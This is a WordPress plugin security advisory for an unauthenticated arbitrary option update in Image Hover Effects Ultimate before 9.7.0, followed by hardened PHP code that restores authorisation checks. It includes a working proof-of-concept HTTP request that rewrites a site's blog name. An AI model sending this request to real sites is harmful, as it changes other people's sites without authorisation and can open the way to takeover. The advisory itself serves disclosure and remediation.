WPVDB-ID: 75DA4102-7063-407F-975E-28BE6ED33AAC
Published: Dec 15, 2021

Image Hover Effects Ultimate < 9.7.0 - Unauthenticated Arbitrary Option Update

Source: wpscan.com
Tags: image hover effects, unauthenticated, arbitrary update, rest api, attackers, blog options

EPSS: 0.002 (percentile 65.1%)

The plugin does not perform any authorisation checks in its REST API endpoints; one of them could allow unauthenticated attackers to update arbitrary blog options. The original report mentioned the issue being fixed in 9.6.2; however, it was still possible for attackers to exploit it, and proper remediation was done in 9.7.0.

PoC

POST /wp-json/ImageHoverUltimate/v1/oxi_settings HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Connection: close

rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22Owned%22%7D
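The root cause described above is a REST route registered without a permission_callback, which WordPress treats as public. The following is an added illustrative example of the hardened registration pattern, not the plugin's own code: the route and the rawdata parameter shape come from the PoC above, while the ihe_example_* function names and the allow-listed option names are assumptions.

```php
<?php
// Illustrative hardening of a settings route (assumed names, not plugin code).
add_action( 'rest_api_init', function () {
    register_rest_route( 'ImageHoverUltimate/v1', '/oxi_settings', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'ihe_example_save_settings',
        // The missing piece in the vulnerable pattern: without a
        // permission_callback the route is reachable by anyone.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args'                => array(
            'rawdata' => array(
                'required'          => true,
                'type'              => 'string',
                'validate_callback' => 'ihe_example_validate_rawdata',
            ),
        ),
    ) );
} );

// Only these option names may be written through this endpoint (assumed list).
function ihe_example_allowed_options() {
    return array( 'ihe_example_animation_speed', 'ihe_example_cache_enabled' );
}

// Runs before the callback: reject malformed JSON or any option name outside
// the allow-list, so a core option such as "blogname" (as in the PoC) is refused
// even for an authorised caller.
function ihe_example_validate_rawdata( $value ) {
    $data = json_decode( $value, true );
    if ( ! is_array( $data ) || empty( $data['name'] ) || ! array_key_exists( 'value', $data ) ) {
        return new WP_Error( 'rest_invalid_param', 'rawdata must be JSON with name and value', array( 'status' => 400 ) );
    }
    if ( ! in_array( $data['name'], ihe_example_allowed_options(), true ) ) {
        return new WP_Error( 'rest_forbidden_option', 'This option cannot be updated via this endpoint', array( 'status' => 403 ) );
    }
    return true;
}

function ihe_example_save_settings( WP_REST_Request $request ) {
    $data = json_decode( $request->get_param( 'rawdata' ), true );
    // The name is already allow-listed by validation; still sanitise the value.
    update_option( $data['name'], sanitize_text_field( (string) $data['value'] ) );
    return rest_ensure_response( array( 'updated' => $data['name'] ) );
}
```

Note that with cookie authentication the capability check only sees a logged-in user when the request also carries a valid X-WP-Nonce header; a request without it is evaluated as unauthenticated and rejected by the permission_callback.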
